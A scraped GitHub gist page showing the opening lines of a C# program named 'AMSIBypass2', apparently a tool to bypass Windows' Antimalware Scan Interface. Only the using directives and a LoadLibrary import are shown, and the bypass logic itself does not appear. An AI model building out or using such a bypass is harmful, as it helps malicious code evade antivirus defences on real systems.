Skip to content

Instantly share code, notes, and snippets.

View eaneatfruit's full-sized avatar

eaneatfruit

View GitHub Profile
using System;
using System.Runtime.InteropServices;
namespace AMSIBypass2
{
class Program
{
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);